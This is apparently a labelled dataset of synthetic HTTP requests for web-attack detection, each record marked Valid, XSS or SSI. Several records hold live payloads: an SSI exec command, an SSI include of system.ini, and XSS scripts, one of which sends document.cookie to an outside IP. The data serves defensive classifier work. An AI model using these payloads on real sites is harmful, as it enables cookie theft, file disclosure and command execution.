User-Agent: <!--  #exec cmd="c:\progra~1\l72rLsndi4\fmaaIl\kenlk7.exe     d:\btttjo\www.riinllnste.org\rmp\database.mdb  /x  exporttofoxpro"-->
UA-CPU: MIPS
Via: wy2/6.2 88.118.90.153, HTTP/7.7 65.254.229.79, 4.8 www.oEedeoht.gif
Transfer-Encoding: compress
Upgrade: pat/5.1, n6ps/0.1, ofEr/6.7
----: -----------------------------

null

End - Id: 40234
Start - Id: 28537
class: Valid
GET /dSpnrBIESxR4hiuPa@r/zqdautoexec/gecnsy/ooE@APe45.5/e2aosoa/St/TsEbilnoT/sYJeaREidUO@-xe_T/m3/vPkdxpv1/between4QHCc@.d1/iQM.png?a9ecavned=1142722 HTTP/1.1
Host: 220.253.99.236
Connection: close
Accept: application/*;q=0.2, video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 8.219.184.213
Cookie: t6y=pq cds;5nn8unita5naw=adit
Cookie2: $Version="9"
Date: Sun, 17 Feb 08 17:26:20 GMT
ETag: "8DVUS.kNUOfqcr9H"
Expect: 100-continue
From: tuezrt@nexhlht5a.it
If-Modified-Since: Wed, 23 Jan 08 05:15:34 CET
If-Unmodified-Since: Fri, 06 Oct 06 10:40:48 GMT
If-Match: "mR8h8@0nytA5Zmrc5"
If-None-Match: "R2xHLlUxgSI-kSozzJ"
If-Range: *
Max-Forwards: 1982
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: 1h6aL 2soNn=rl1nsusL
Authorization: usrfc5 s0lCaie=e9nig
Range: 6-267184,-1,5-7119
Referer: /asihe/dMnth/oot5rs7e.html
TE: trailers,deflate
Trailer: Accept-Charset
User-Agent: Mozilla/3.3 (Windows; U; WinNT 0.3; aa-yn; rv:4.1.0) Gecko/37816251
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6545x8948
Via: 2.4 www.aRTte6.jpg, 8.6 236.139.238.69
Transfer-Encoding: gzip
Upgrade: 8omcl/7.6
Warning: 648 www.ttih.html "ord3rsoanoeqih" "Mon, 01 Jan 07 08:14:14 UTC"
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 672108482852
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28537
Start - Id: 28841
class: Valid
GET /KlkD/HallJ@TBm-cic/usrd/linkcpUbetweenoKps/Iub-ijBp/b9dqthHesngt9S/x0H7UtU-DWbgy3lf_/eYmp24JBTvvV/m1ei5e/i7@81Zoi.KINLpk5D/asgicvYvPkF6fxeJo.jsp?n3welaIefn=%29ebgsoundL%26i%7Estni&hnkn1LelujhasI=7&nvsj8zfaes5t=10&hnenscah4=childl&Jnmt5uko2aehs=eil8https+cred0C+inserttij%28sh HTTP/1.0
Host: www.ecAtec.st
Connection: snhmoe
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: oa-ut4;q=0.8, rt-oEyenne, ed-Ctmpiz, w7ahwrh-xusegnb, tkfd-o;q=0.2
Cache-Control: max-age=1957
Client-ip: 200.47.34.57
Cookie: M-9nph-hS_andnode@1m=7051765;3HFeeDRl2tmwmm=46
Cookie2: $Version="264"
Date: Fri, 05 Sep 08 07:41:35 UTC
ETag: W/"D-LFA3Yi1z1Rsvxri"
Expect: 3jmlh
From: 4zbw@syof.net
If-Modified-Since: Sun, 15 Oct 06 17:07:56 GMT
If-Unmodified-Since: Sun, 01 May 05 21:47:19 GMT
If-Match: "tV9KRyKEjm07DdCTt"
If-None-Match: "3sbpDi0TE4xQ_dn"
If-Range: Tue, 04 Jan 05 23:05:10 UTC
Max-Forwards: 0776
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM SW9oZW8yc1RiaU5lRXNzZDNwb3NsZWVzYWNRbWJpZWxkVTR4R2RxaA==
Authorization: hrar m5Nuia=iric
Range: 3-,-55290
Referer: http://www.sdeD0lit.net/uatd/3Dog/1ei6ey/hriepu.fgf
TE: trailers
Trailer: Max-Forwards
User-Agent: 7lTckeere (rQhRwxnO; gjhBbp6L7t; thnS6Y5M.; renIxe)
UA-CPU: x86
UA-Disp: 550,6527,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 122x5513
Via: 5.8 www.LterzxcY.css:89, HTTP/3.8 128.13.200.130:81, HTTP/4.6 www.Esahy.css
Transfer-Encoding: deflate
Upgrade: EEoc/3.8, n7isho/5.6, mZTrt/4.3, tisotc/2.6
Warning: 157 www.r3hkaor.js "yoe7ri8dLNtecrho" "Tue, 22 Sep 09 04:37:42 CET"
X-Forwarded-For: 26.164.27.111
X-Serial-Number: 39502
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28841
Start - Id: 48160
class: XSS
GET /hthHQl/nffCx@nZ/thEadaEEaprynnmaiu6/mraoaiti2d4eecMe/0QWX6w91P0v7xZ/SotiO.aspx?replace9g7zRCeconnect3=1289&nmpEpt=%3Cdiv+++style++%3D+%22+binding%3A+++url%28%5Bhttp%3A%2F%2Fwww.ordege.com%2Fscript%2FygVniuaedA.msf%5D%29%3B++%22++++%3E HTTP/1.1
Host: 49.133.134.3:80
Connection: close
Accept: audio/*;q=0.7, image/gif, text/*
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.3, gzip;q=0.0, gzip
Accept-Language: *;q=0.3
Cache-Control: min-fresh=27
Client-ip: 211.190.214.99
Cookie: gsMCeEi=whQ;huqlts7srHavcn=w1G;Laccess_logK-x4=btt;uu;ng;gty8YdOvjAnF=nnhivq5;9gDLBHacceptBP=/hhl6zofjo0EcsD
Cookie2: $Version="37"
Date: Thu, 17 Sep 09 06:08:11 GMT
ETag: W/"KTjmOB4QF.aHd_v"
Expect: 100-continue
From: sfatroh@4tt9delj7a.org
If-Modified-Since: Sat, 13 May 06 06:12:11 GMT
If-Unmodified-Since: Mon, 01 May 06 04:30:17 GMT
If-Match: "4EKvulqZiW8Zkn@"
If-None-Match: *
If-Range: *
Max-Forwards: 6114
MIME-Version: 7.0
Pragma: lCbhoBeh=asresse
Authorization: Digest algorithm=MD5-sess
Range: 248-
Referer: http://www.6iiyo.cz/bqmic/rfRdc/tspen/mtiieuaw.jpeg
TE: gzip,gzip;q=0.9
Trailer: If-Modified-Since
User-Agent: 5nbiawnunceiegno
UA-CPU: MIPS
UA-Disp: 1387,690,8
UA-OS: Win98
UA-Color: color8
Via: 2.5 www.atpuSicc.jpg
Transfer-Encoding: grg3ro
Warning: 469 www.eeshc.gif:6 "8tbhssqusptoj" 
X-Serial-Number: 532844106814003
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48160
Start - Id: 1351
class: Valid
GET /cbURyPO/d7YjzDP/s28etjhc58HxWrEqY5x/IT7Afs/dteneufS/piysgdtgn2egwdoaS/YtwMB/wT53ko6ji8fGUX/tkoeeEdOrjvi5lr.htm?nthEd=nee8omcei5E&7nUkunion-M=yAPGctsnJ&44frssE=385&astozdatopteq=+o%5Boy+tne%3E&Uperlxterm@jmuP2bWy=edm&6sdrdi3ceg=eFNE-&rumSr4tpp2eb=Bm7&yerotIoaFsin=6&s1yg6of5d=3child5log%24&ase4uelo7e=jizupVf%25up-tgulwephp&uVQQX2R=akpTUL57sJf.&YI_g0ipassthruiframe5=sret&oa=sxQF_AEU.3&tpD=yz1ST_%40GAE HTTP/1.1
Host: 103.252.8.207:80
Connection: keep-alive
Accept: video/*, audio/*;q=0.9, text/*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: f-r;q=0.4
Cache-Control: max-stale
Client-ip: 71.250.186.224
Cookie: 0fVeCwp-@85include=tr5f.kjAR
Cookie2: $Version="315"
Date: Thu, 19 Nov 09 22:47:19 UTC
ETag: W/"-J00YEnnw5DfO@N"
Expect: rajicDn
From: wi2twwpe@rrmwot4.ch
If-Modified-Since: Fri, 30 Jan 09 08:36:31 GMT
If-Unmodified-Since: Sun, 26 Aug 07 05:11:36 UTC
If-Match: *
If-None-Match: "zTOXAZ-9jmfdTHeO"
If-Range: "765jzxf0UNIMHSwdWA9"
Max-Forwards: 560
MIME-Version: 3.4
Pragma: eg7pudh='pbv'
Proxy-Authorization: NTLM b2l0YXRuTnQ1eWVleWVTN3RyekVlZGh5b2UxM3Rhd0Fy
Authorization: NTLM U05oYWluRW5lcXlta1NhaXVlNGFlSXJuaGwyRG9hZ2lzcnRyb29mamVu
Range: 518-86,86-,865-
Referer: /0rpmw/oell/tnedOnu.php4
TE: deflate,chunked;q=0.5
Trailer: If-None-Match
User-Agent: Mozilla/1.8 (Windows; U; Windows NT 0.8; ju-et; rv:5.9.8) Gecko/12699317
UA-CPU: Sparc
UA-Disp: 0720,076,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 290x591
Via: FTP/6.7 www.aopsa.htm, FTP/0.5 www.ue35.css:256, FTP/0.8 171.228.40.72
Transfer-Encoding: deflate
Upgrade: yans3i/2.5
Warning: 373 www.2zTns2mm.tiff "ero9leMeia" 
X-Forwarded-For: 185.64.155.53
X-Serial-Number: 814700
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1351
Start - Id: 32788
class: Valid
POST /s1o/DxtermonomsAservices_5E/diooaihogtamd/tn7AA/olCLC.B5_@q/positionsTd/oem0lgmyttre.mdb? HTTP/1.1
Content-Length: 200
Content-Language: h8
Content-Encoding: deflate
Content-Location: http://u3h8v.net/ksmena/7Prnstt/tneataxs/Steo.png
Content-MD5: TmxucmxuYW01ZTFVdGswbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 30 Jan 10 09:04:19 UTC
Last-Modified: Mon, 05 Jan 09 12:35:27 GMT
Host: 255.123.110.142
Connection: lbit
Accept: application/*
Accept-Charset: gb2312;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: 1wam-te6OS, obb-g1tid, it4u-digzteeh;q=0.2, oyplttos-yeen7, vr8teueb-eu;q=0.3
Cache-Control: cod=zcitoro3
Client-ip: 87.1.179.160
Cookie: aSr=q@EJUx
Cookie2: $Version="153"
Date: Thu, 09 Dec 04 03:32:18 GMT
ETag: W/"vK02a@msn5hSA8h"
Expect: 100-continue
From: edli@9eteq.st
If-Modified-Since: Mon, 31 Mar 08 12:17:01 UTC
If-Unmodified-Since: Sat, 11 Apr 09 15:32:52 GMT
If-Match: *
If-None-Match: "KPRaXb3CdD_Z1-H2od"
If-Range: Wed, 10 May 06 16:19:29 UTC
Max-Forwards: 7253
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic TG83aUk6Y3h4ZWE4Y3A=
Authorization: topii 5no1=nS2edr
Range: 39-,156281-891264,-22
Referer: /ederm/etde2ea/vd0EyztE.asmx
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: uVh3MFJAC http://www.5ww8n7hW.st
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4217x4135
Via: abltio/4.5 245.97.5.120, lifhi/4.1 www.mHhetem.gif, 4.6 26.183.51.86
Transfer-Encoding: deflate
Upgrade: teeo23/2.3, xnsmm/4.8, ier/8.7, vw4/5.1, a5enee/7.1
Warning: 474 26.152.35.166 "G8omu" 
X-Forwarded-For: 4.132.206.75
X-Serial-Number: 79340076577715880998
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

owNdcTotnhel=%6all&sieln0k=19808&yEmbt=JfoNossalisiei&sdUgi=2uundesd&91soOtaw83j=hbreso5waoodr6ew&tKeseta1snhae3e=tocifE7r&tpa=D &h4tEYeiine=/i&rts18E6r3ces1ot=528&roUunaslcoIid=oahaonrmaycgertiar

End - Id: 32788
Start - Id: 40603
class: SSI
GET /Zerpn0trIpl1L0reAeul.gif?yJF4_OxallexN=%3C%21--+++++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E HTTP/1.1
Host: www.isahbwaclr.org:80
Connection: t6n1e5
Accept: image/gif, image/*, application/rtf
Accept-Charset: x-mac-arabic;q=0.2, utf-7, iso-8859-1;q=0.9, x-mac-hebrew;q=0.6, x-mac-greek
Accept-Encoding: compress, deflate;q=0.4
Accept-Language: eni-tarso3F, ahhasal8-hos;q=0.5, eyq1-p
Cache-Control: no-store
Client-ip: 146.4.65.176
Cookie: eeet4pq=5QoAT2lFG;jdeletesfUe=aastynoG;js=qoehr;ccenha=8
Cookie2: $Version="0"
Date: Thu, 20 Apr 06 11:03:52 UTC
ETag: W/"-Vp.xW@OMQO677mJ"
Expect: sioasme=irebws;i3csvzh
From: q67lte@ielenft.it
If-Modified-Since: Wed, 14 Feb 07 07:04:38 GMT
If-Unmodified-Since: Thu, 11 Mar 10 18:07:43 UTC
If-Match: "0hstC8V1OR_eVE7gQ8"
If-None-Match: *
If-Range: Mon, 03 Aug 09 12:00:30 GMT
Max-Forwards: 61
MIME-Version: 8.9
Pragma: qt='a'
Proxy-Authorization: NTLM anpsbW5sd3hvZHllc2w5ZWEyVGFucnVQaHlvb25wZWlkaG1wZXl1
Authorization: sLpp optl2ev6=eorea
Range: -7,-7178,-26215
Referer: http://son2ntq.com/ujdddatr.jpg
TE: deflate
Trailer: Expect
User-Agent: Mozilla/0.0 (compatible; fesoia; Linux i386; eronBbuN; z1Nwa1effu; jisadm5t)
UA-CPU: PowerPC
UA-Disp: 252,6478,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7337x662
Via: 9.6 www.mn0j.js, 2.8 46.182.110.198, 7.3 www.dln4ltn.htm
Transfer-Encoding: compress
Upgrade: awe/2.0, seeicn/1.1, irwd1t/6.6
Warning: 740 www.iawi.png:527 "cErneOeniy5Rfoed" 
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 55192
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40603
Start - Id: 7549
class: Valid
PUT /binlRN-BGeO/Nksc9svbscriptSKlibM/aaOro/adxbtamiiSi6Ei/iMknf_MrsCl@1HOoT.tiff? HTTP/1.0
Content-Length: 11
Content-Language: esn,s
Content-Encoding: compress
Content-Location: /tsfed/j8tsI2r.pl
Content-MD5: cWl5YWQ1TExhenRUY2xvZg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Aug 04 06:48:45 UTC
Last-Modified: Tue, 03 Oct 06 04:52:43 UTC
Host: www.aahcxgDitu.ch:34
Connection: cncf
Accept: application/*, video/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=38
Client-ip: 23.180.135.15
Cookie: lt=5;Z@eQL=071;-5JFqzBn7=i35B0ot;oltNrnt=9103345;si23m9wWthaelM=09955657
Cookie2: $Version="0"
Date: Sun, 04 Jan 04 09:57:44 GMT
ETag: W/"R.aisbSEVR_HgA0N"
Expect: 100-continue
From: nanSyva@xAweeehqTs.de
If-Modified-Since: Mon, 26 Jul 04 07:34:36 CET
If-Unmodified-Since: Thu, 08 Jan 04 07:46:45 GMT
If-Match: "oZXk7vg5OefTZLeCv"
If-None-Match: *
If-Range: "4WIauTSqb1ryBhDJn4"
Max-Forwards: 1600
MIME-Version: 1.7
Pragma: teBW=ro
Proxy-Authorization: NTLM d2llb2V3b3ZodXNkb3RkVGFFaGJoMHFsbnVxbG1hbXQyc2V6b2hoYQ==
Authorization: Basic YmVpMXA6RWdydGhpYQ==
Range: 31105-
Referer: http://steWei.uk/jdotol/Repres/znegq/eeEl.pdf
TE: chunked
Trailer: Via
User-Agent: Mozilla/0.8 (Machintosh; U; Mac OS X 3.3; nj-we; rv:6.3.1) Gecko/05880447
UA-CPU: x86
UA-Disp: 845,5230,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8581x949
Via: 7.7 www.tHen.tiff, HTTP/1.2 28.86.73.93, scaet4/3.5 www.n8olNet.html:586
Transfer-Encoding: xma8
Upgrade: Tbwl/8.0, e3IaS/2.0
Warning: 554 www.d4nu.html "eitMhs2Scmrexg1r" "Tue, 13 Jan 04 16:21:13 GMT"
X-Forwarded-For: 191.61.229.46
X-Serial-Number: 49024
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

of0a=sqv_qF

End - Id: 7549
Start - Id: 46765
class: XSS
POST /cR8hi6r9amAiu/n-1B4WnJfW/tsDp/qbvXnKz_9/sotacsNnedgw/aG/eyUb/Qinetcat4update/5snh.asmx? HTTP/1.0
Content-Length: 186
Content-Language: Pt7b7r2u,ef
Content-Encoding: gzip
Content-Location: /wha2.mpeg
Content-MD5: N2NwZThlZW54aWhzVHJpeA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jul 04 10:02:06 UTC
Last-Modified: Mon, 31 Jan 05 16:26:38 GMT
Host: 175.160.74.233
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, compress, gzip, compress
Accept-Language: hiIe-neoo;q=0.4, b-Bwsti7, mw4E-lituats4;q=0.7
Cache-Control: no-cache
Client-ip: 202.152.82.23
Cookie: ielSyYRCseeeal=ropt
Cookie2: $Version="609"
Date: Fri, 11 Jun 04 04:55:34 CET
ETag: "uvWwqLBwApGZcIhP"
Expect: 100-continue
From: dyenT@gpt6glsG.cz
If-Modified-Since: Thu, 22 May 08 06:18:58 UTC
If-Unmodified-Since: Mon, 03 May 10 03:41:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 92
Pragma: no-cache
Proxy-Authorization: o1svi Elj40=bhoesO1
Authorization: e7zii lLnlii4h=jeo1mtj
Range: -03,-42983
Referer: http://www.jresr.gov/l0hfct.txt
TE: deflate;q=0.5,gzip,deflate;q=0.7
User-Agent: Mozilla/4.4 (compatible; 3eoe; SunOS sun4u; cRgsN; aetEct)
UA-Color: color32
UA-Pixels: 1199x1516
Via: FTP/2.3 www.Edityfik.js, Ar9s/1.7 90.180.35.219, 7.8 www.a4Ieoorn.jpg
Transfer-Encoding: compress
Warning: 169 130.84.60.97 "veojxxdsnqtnotxti" "Sat, 18 Mar 06 20:44:29 GMT"
X-Forwarded-For: 183.74.153.68
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1t=cFPdIg4ABLc&-TlwherejXYposition=<!-- -- --><script >[window.open('http://224.96.206.192/ni.aspx'+document.cookie);]</script  ><!-- -- -->

End - Id: 46765
Start - Id: 48265
class: XSS
POST /hX9r1/E8FXF7sJl/50Uwy-uTx1LO_cpXCL3I/isBI2-/TXIlocationT2Jd-6/bG3eD6V6worfAm9vjXx/cx670F@tU8vw4LXoUJ/3x/otuOmCFNCCYuLPesB/2sOM0@/c.scriptquMj-Vl/onaoeedpiae.exe? HTTP/1.1
Content-Length: 163
Content-Language: do,m
Content-Encoding: deflate
Content-Location: /n0gho/penEuegi/nrxfjx.swf
Content-MD5: b2FpcnJlemdlY25hc1RkaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Jan 09 20:32:59 UTC
Last-Modified: Sun, 17 Jul 05 18:17:16 UTC
Host: www.bshr9hoho.org:97860
Connection: nENhQSpd
Accept: */*
Accept-Charset: iso-8859-8;q=0.4
Accept-Encoding: 
Accept-Language: Lxa-rir;q=0.6
Cache-Control: max-age=4787
Client-ip: 166.142.44.213
Cookie: oaxeOou=ouy;eng78oglnrxRt7i=tjlnaE5dtgn0haRi;n5aucteexd0lw=Yj7noyiev;c2Dagdijhf=<a   href   =    "  about:<s&#99;ript>[alert    ('euity');]</script >   "    >;vnxqaebAbtTf=aoetg
Cookie2: $Version="02"
Date: Wed, 15 Oct 08 17:04:41 UTC
ETag: W/"Wo44q1fhwtx@tDhd9M"
Expect: ieboei=mixey6e
From: aeebosbw@2l6nl.biz
If-Modified-Since: Sun, 20 Nov 05 17:38:50 CET
If-Unmodified-Since: Fri, 16 Jan 04 06:42:53 UTC
If-Match: "XNxpMDQ47Ch@clOYKLMZ"
If-None-Match: "Fr5vHC@c6rYPassMOika"
If-Range: Sun, 10 Apr 05 18:20:26 GMT
Max-Forwards: 87
MIME-Version: 9.1
Pragma: lGt='druei'
Proxy-Authorization: Basic aGV5NXNpOnNLb28=
Authorization: Digest cnonce="ecral"
Range: 431947-
Referer: http://imwofs.it/aDen/meRlun/sUldmL/j2aoes/tnxrnos.wav
TE: trailers
Trailer: If-Match
User-Agent: aSgmihcjd/1.4.9.6
UA-CPU: Sparc
UA-Color: color8
UA-Pixels: 9755x524
Via: 9.1 0.46.134.210, 7.2 www.crt3.html:761, pip/1.0 252.11.15.104:941
Transfer-Encoding: setd
Upgrade: hmedu/0.7, dghhex/5.6, nnee/7.2, huoxb/6.1
Warning: 671 129.210.117.15:935 "9nmssHeleesiilmnpeo" 
X-Serial-Number: 96907185083
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gf3cuGkZZqno=tpoenytreeEse&tidnxnire=lBzczb&mochaiVO=57953730&vrett1=5123&gsbcnew=gotaiEjdhen7tmO&bcWiooxbfeigr=|ec &ihsu8i2eshe=hnta&2p3v=dnTrvc3&qzfig=65107742

End - Id: 48265
Start - Id: 16406
class: Valid
GET /ebs7ttno2iHhbeou7aea/wSaoosconeYu2eeimmEn/iRfytt9ezess8zoma/rn6h/9qpjOruqjaai/dNqa986H@6KDh/ewC2c3UtPH5A8jaq5SsO.html?tr=ccjrft+dcatMbgsounde&WxanEarlnai=puqVjJS&ftpbE-8XbJ=iFxI-EsDSRV&tld5oae=rBXCq6&caglcweulordbj=eIa4DBQp%40&oPec=sTBXeR3o6-&d0=714155&tVolaoaar3lsR=teya&q9oeatiSN=%279htpass&2eeom8hI4e=tuI+&6cUEQ4MO@=qo%24o%2Fheh3xie HTTP/1.0
Host: 37.72.216.220
Connection: keep-alive
Accept: text/xml
Accept-Charset: *
Accept-Encoding: *
Accept-Language: l2hs-ixn, l9s-nesms, ou47-dlo;q=0.9
Cache-Control: no-transform
Client-ip: 129.156.31.222
Cookie: eThnwac4=0vX;aGorhd=0655;eisaa=aCrHoaCFq
Cookie2: $Version="92"
Date: Sat, 01 Jul 06 07:56:31 GMT
ETag: W/"ETw_iNmkxqQeHE6"
Expect: 100-continue
From: seale@faF5s1.ch
If-Modified-Since: Tue, 15 Sep 09 10:10:09 UTC
If-Unmodified-Since: Fri, 11 May 07 08:12:49 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 25 Sep 09 02:20:52 CET
Max-Forwards: 6441
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM czJUaTVld0hpZ2gxbjhnbnAyMWd0aTduaXJudWVFUWVydGFpc3M=
Authorization: NTLM aU5nZWlhaG5vdGR1c2E0aE4wc3RpZXJyaG5ubmU3aWU=
Range: 490-87428,9-6
Referer: http://Emi1oe.cz/TouoMtn/ox4l.nsf
TE: chunked;q=0.1,chunked,gzip;q=0.9
Trailer: Expect
User-Agent: Mozilla/8.8 (Machintosh; U; PPC Mac OS X 3.8; es-ac; rv:9.7.9) Gecko/86866544
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9846x663
Via: 0.0 www.iostcoUh.htm
Transfer-Encoding: lnio; erct=wnIohne
Upgrade: Or46/0.2, nsn/5.8, nEiiOe/8.0, Tldds/1.2
Warning: 481 www.dsiixEh.shtml:370 "isiipeE" 
X-Forwarded-For: 131.177.35.234
X-Serial-Number: 5481271353118244328
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16406
Start - Id: 10072
class: Valid
GET /bg6fnTKClQKC/@uRj5kPvrRoQ/t1oant3nsytdoTho8/Rwrm@gmvaconnect/0l_sTmM3OqtZD/gjDotw6kdo3/0nI/Soltantexcytts2/zlF9PiUp3qC/includehBAs@-k3veR/gjAotaeoairadto5.dll?Rtz7=668608490&V-8h1B7=4lieteOnz&a4ubomIieRLq=xe5%3An++u%7Eedrb&sigoabdsRa=735944&adeo=9ld3E6rekashp&Woso2Cz=%5Bs&Haaaoyot1e=Ah+4u8&mn=j3yintue5cgtdwr&h9efto5h1naimod=m%2Bs0%3Ba7besni&oaiiEjosen1otts=774&pobject4csi=oNautoexecjsystemelrbinnftpnnrw%3Cln&ieEfkrttIoo=rnhitOde6&9hssp0Ke=l4on&1Hn=hgdxmlge%5D%3FO HTTP/1.0
Host: www.laiahe.cz:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: n-2, u-xoy1Or, cetile-t, ah-soovmg;q=0.6
Cache-Control: max-age=805
Client-ip: 137.46.99.85
Cookie: Chissh=a\iS
Cookie2: $Version="231"
Date: Thu, 31 Dec 09 18:35:38 UTC
ETag: "yZwKRjevrp-4Czu_o"
Expect: lxltoMtt=olvdcho;8ecooa=lrlnd
From: aemYeste@u736nnw.biz
If-Modified-Since: Sat, 15 Nov 08 14:38:23 GMT
If-Unmodified-Since: Thu, 05 Feb 09 13:19:40 GMT
If-Match: *
If-None-Match: "DSCC59jVe2Um5sKzr"
If-Range: Sun, 25 Nov 07 05:45:39 CET
Max-Forwards: 5
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic cmViMWxvdGE6aHhSTA==
Authorization: Digest uri=http://ese8.ch/nito/meotehoe/iNeetyek.conf
Range: 1978-3,68-
Referer: http://www.1Pneye.ch/3xsie/e0dbh/nc2e/rgsA6pum.js
TE: deflate,chunked;q=0.4
Trailer: Via
User-Agent: Mozilla/4.1 (X11; U; Linux i586 7.8; q7-gr; rv:6.4.1) Gecko/54481429
UA-CPU: 68000
UA-Disp: 046,3752,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6453x8240
Via: 4.1 149.163.11.94, FTP/3.7 www.aaOb.htm
Transfer-Encoding: gzip
Upgrade: 0se/9.9
Warning: 334 201.54.73.174:7 "ostm1" 
X-Forwarded-For: 189.69.165.224
X-Serial-Number: 9719110193
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10072
Start - Id: 2769
class: Valid
GET /usmagathsrNCt/SostebhakgNecArscph/GIIU./n07iy/C7dZ@QE/qteiaesrbu/s9i0fTSs1_zzT3Ltak/ejs2a3G625C7N/fCpWbVgEfjg0KLucbvL.jpg?eirdtiGor=138&rrhtcehleoilfa=bdELqfS&lrjlccdelo=2akXd7P6&yGh3KshutdownLucpa=3984&ueeea4oo=ehem%3Cret-&fctra1arhmeu=536 HTTP/1.1
Host: 203.180.120.196
Connection: e6oz
Accept: */*
Accept-Charset: cp-950, x-mac-roman;q=0.7, euc-jp, iso-8859-4;q=0.0, x-mac-greek
Accept-Encoding: 
Accept-Language: og8cynpe-tJO1;q=0.7, 8rAtii2A-n;q=0.4
Cache-Control: no-store
Client-ip: 244.22.33.32
Cookie: B.i4ieH9Slw=6757
Cookie2: $Version="55"
Date: Tue, 05 Feb 08 20:49:17 CET
ETag: "0_4Ow6kduQ8_8BQzx"
Expect: ud20arnu
From: lqlhi@vaenn.fr
If-Modified-Since: Fri, 02 Jun 06 08:35:53 CET
If-Unmodified-Since: Tue, 21 Oct 08 21:14:44 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 12 May 06 15:41:10 CET
Max-Forwards: 9090
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: a6te0 gehaiuaA=e0ls5enT
Range: 1933-
Referer: http://0cnyyane.it/eejrgO/sGs4o/io6r3d.fgf
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/4.2 (Windows; U; WinNT 4.0; dY-lo; rv:0.8.0) Gecko/37088183
UA-CPU: Sparc
UA-Disp: 9580,602,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x004
Via: nsn5/9.7 www.pmumeer.png, pic/2.5 www.r1ti.gif, 2.7 www.3ezirci.htm:2130
Transfer-Encoding: compress
Upgrade: silEs/6.4
Warning: 581 222.35.204.94 "rhuhssl" "Mon, 12 Feb 07 03:54:33 UTC"
X-Forwarded-For: 33.121.40.254
X-Serial-Number: 82627
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2769
Start - Id: 6812
class: Valid
PUT /stpBnsteoeSrn2td.dll? HTTP/1.0
Content-Length: 21
Content-Language: 73zal5o2
Content-Encoding: deflate
Content-Location: http://www.pfa4eteo.st/ltcs/niytn/oGii11.conf
Content-MD5: aW93MmpuYzk2Z3llZWhlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Feb 08 03:50:37 CET
Last-Modified: Sat, 20 Sep 08 11:07:45 CET
Host: 178.228.5.135:0729
Connection: keep-alive
Accept: text/html, video/quicktime, video/*;q=0.5
Accept-Charset: hz-gb-2312, x-mac-ce;q=0.2, iso-8859-5, utf-7;q=0.0, cp-936;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: WtmTyr='mkT0tat2'
Client-ip: 239.194.209.222
Cookie: 4eb3se8aMtg=sdtAiwfahwhOt;etd=9
Cookie2: $Version="777"
Date: Thu, 19 Oct 06 22:55:50 UTC
ETag: W/"HO-kbK.Uutl3mUwK.5"
Expect: ode2tbm
From: n7hf@Nessscta.com
If-Modified-Since: Thu, 27 Jan 05 15:03:34 CET
If-Unmodified-Since: Tue, 27 Mar 07 21:21:05 UTC
If-Match: "7rM.X3pBOM9WM8V"
